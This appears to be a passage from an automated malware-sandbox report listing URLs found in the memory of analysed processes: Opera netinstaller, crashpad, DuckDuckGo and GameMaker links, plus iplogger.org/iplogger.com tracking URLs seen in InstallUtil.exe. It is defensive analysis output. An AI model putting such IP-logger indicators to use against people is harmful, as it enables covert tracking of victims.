                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://crashpad.chromium.org/
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://crashpad.chromium.org/bug/new
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3370357777.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391349315.0000000050E14000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965488814.0000000054A38000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391349315.0000000050E14000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3370357777.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit--annotation=channel=Stable--annotation=plat=
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3392413401.0000000050EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit--monitor-self-annotation=ptype=crashpad-hand
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit0x2e4
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391875996.0000000050E54000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3392413401.0000000050EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submitC:
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391875996.0000000050E54000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submitP
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000889000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/%4
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/.
                    Source: XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/G
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/H
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/i4G
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/p
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/ry
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000889000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000879000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3371204776.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary)
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary3
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary9
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary;
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binarya
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryd
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryj
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000879000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binarylH
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryu
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryx
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryy
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/=
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/_
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3371271590.0000000000907000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390871165.0000000054B34000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390454774.0000000054AE0000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3454948033.000000002308C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3461672066.000000002309C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1#
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3138720496.0000000000E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1%
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390110534.0000000054A9C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1T
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65199&autoupdate=1&ni=1&stream=stable&utm_campaign=767&u
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/o
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/5
                    Source: XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/ftp/pub/opera/desktop/108.0.5067.24/win/Opera_108.0.5067.24_Autoupdat
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/u
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download3.operacdn.com/v=
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
                    Source: svchost.exe, 00000002.00000003.2025274092.000002191A333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000002.00000003.2025274092.000002191A2C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://gamemaker.io
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://gamemaker.io)
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://gamemaker.io/en/education.
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://gamemaker.io/en/get.
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://help.instagram.com/581066165581870;
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpString found in binary or memory: https://help.opera.com/latest/
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1luzz
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/privacy/
                    Source: InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/rules/
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://legal.opera.com/eula/computers
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://legal.opera.com/privacy
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpString found in binary or memory: https://legal.opera.com/privacy.
